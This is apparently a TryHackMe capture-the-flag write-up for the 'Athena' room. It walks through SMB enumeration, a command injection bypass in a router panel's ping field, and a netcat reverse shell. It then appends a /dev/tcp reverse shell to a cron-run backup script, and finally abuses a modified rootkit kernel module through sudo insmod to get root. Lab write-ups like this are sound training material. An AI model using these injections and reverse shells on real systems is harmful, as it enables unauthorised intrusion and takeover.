Athena @ THM
Athena
Port Sacn
Seeing that there is port 80, i visited the web page
I searched through but not, so i checked the smb port
1
smbclient -L //ip//
1
smbclient //ip/public
reading the msg_for_administrator.txt file
Command Injection
So i visited the /myrouterpanel directory on the web
Seeing this what came to my mind was Command injection
I firstly checked if the ping function was working
Seeing that the ping is working i tried 127.0.0.1;ls 127.0.0.1| ls payload but it did not
After some tries i was able to bypas it with
1
$(command)
so in order to get an RCE i used
1
$(nc <lhost> <lport> -e /bin/bash)
I tried accessing the /home/athena directory i keep getting Permission denied
Privilege escalation to athena
1
find / -user 'athena' 2>/dev/null
we se a /usr/share/backup directory which has a backup.sh file in it
Guessing there is process runing the backup.sh file i decided to add a reverse shell inside the backup.sh file
1
echo 'bash -i >& /dev/tcp/<lhost>/4444 0>&1' >> backup.sh
start a listener on 4444
After a while i got a reverse shell as athena
Root
Trying sudo -l
we see that we can run (root) NOPASSWD: /usr/sbin/insmod /mnt/.../secret/venom.ko
USE Ghidra: to reverse the venom.ko file
after some reversing, we notice the hacked_kill function :
we see that in order for give_root() to get called, we need to send a signal 57 instead of 64 as mentioned in the github repository, so this rootkit was slightly modified, let’s try again with signal 57 :
the give_root function may work like this kill -57
so i started a process with sleep 10 &
got the process id and typed kill -57 -pid
Now we got Root !!!